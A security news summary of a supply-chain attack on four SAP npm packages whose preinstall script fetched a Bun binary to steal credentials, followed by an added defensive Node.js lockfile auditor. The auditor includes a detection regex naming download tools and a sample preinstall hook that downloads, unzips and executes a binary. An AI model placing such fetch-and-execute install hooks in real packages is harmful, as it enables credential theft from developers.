SAP NPM Packages Targeted in Supply Chain Attack

Four SAP-related NPM packages used in the CAP and Cloud MTA build workflows were injected with a malicious preinstall script that fetched and executed a Bun binary, delivering an information-stealing payload targeting local and cloud credentials. The compromised packages were unpublished within hours, but the campaign exfiltrated secrets to public GitHub repositories and researchers attribute the operation, dubbed Mini Shai-Hulud, to the TeamPCP group. #MiniShaiHulud #TeamPCP

Keypoints

  • Four SAP NPM packages (mbt 1.2.48, @cap-js/db-service 2.10.1, @cap-js/postgres 2.2.2, @cap-js/sqlite 2.2.2) were injected with malicious code.
  • A preinstall script downloaded a Bun ZIP from GitHub, extracted and executed the Bun binary to bootstrap the malware at runtime.
  • The information stealer targeted local credentials, GitHub and NPM tokens, and cloud secrets for AWS, Azure, GCP, GitHub Actions, and Kubernetes.
  • Exfiltration occurred via public GitHub repositories labeled “A Mini Shai-Hulud has Appeared,” and the malware can propagate by tampering with package tarballs using stolen GitHub Actions tokens.
  • Malicious versions were live for roughly 2–4 hours before being unpublished; Wiz links the attack to TeamPCP based on a shared RSA public key used to encrypt exfiltrated data.
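As an added defender-side example (not code from the article, SAP or Wiz), the Node.js script below audits a package-lock.json for the four compromised versions listed above and flags install-time lifecycle scripts that match the fetch-and-execute pattern described; the lockfile shape, the sample inputs and the heuristic regex are assumptions.

```javascript
// Added example, not from the article: audit an npm lockfile for the four
// compromised SAP versions and flag install hooks that download and run a binary.
const COMPROMISED = {                      // versions as listed in the article
  "mbt": ["1.2.48"],
  "@cap-js/db-service": ["2.10.1"],
  "@cap-js/postgres": ["2.2.2"],
  "@cap-js/sqlite": ["2.2.2"],
};
// Lifecycle hooks npm runs automatically during install.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
// Assumed heuristic: markers of a hook that fetches and executes something.
const SUSPICIOUS = /(curl|wget|unzip|\bbun\b|chmod \+x|Invoke-WebRequest)/i;

// Check a lockfile (v2/v3 "packages" map, keys like "node_modules/<name>")
// for pinned versions on the known-compromised list.
function lockfileFindings(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    const name = path.replace(/^.*node_modules\//, ""); // strip nested prefixes
    if (!name) continue;                                // "" is the root project
    const bad = COMPROMISED[name];
    if (bad && bad.includes(meta.version)) {
      findings.push({ name, version: meta.version, reason: "known-compromised-version" });
    }
  }
  return findings;
}

// Check one dependency's package.json for install hooks matching the pattern.
function scriptFindings(name, pkgJson) {
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = (pkgJson.scripts || {})[hook];
    if (cmd && SUSPICIOUS.test(cmd)) {
      findings.push({ name, hook, reason: "install-hook-fetches-and-executes", cmd });
    }
  }
  return findings;
}

// Constructed sample inputs (not real project data).
const sampleLock = { packages: {
  "": { name: "demo-app", version: "1.0.0" },
  "node_modules/mbt": { version: "1.2.48" },
  "node_modules/@cap-js/sqlite": { version: "2.2.1" },
  "node_modules/foo/node_modules/@cap-js/postgres": { version: "2.2.2" },
} };
const samplePkg = { name: "example-dep", scripts: {
  preinstall: "curl -sL https://example.invalid/bun.zip -o b.zip && unzip b.zip && ./bun setup.js",
} };
console.log(JSON.stringify([...lockfileFindings(sampleLock), ...scriptFindings(samplePkg.name, samplePkg)], null, 2));
```

Run it against a real project by loading its package-lock.json and each dependency's package.json in place of the constructed samples.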

Read More: https://www.securityweek.com/sap-npm-packages-targeted-in-supply-chain-attack/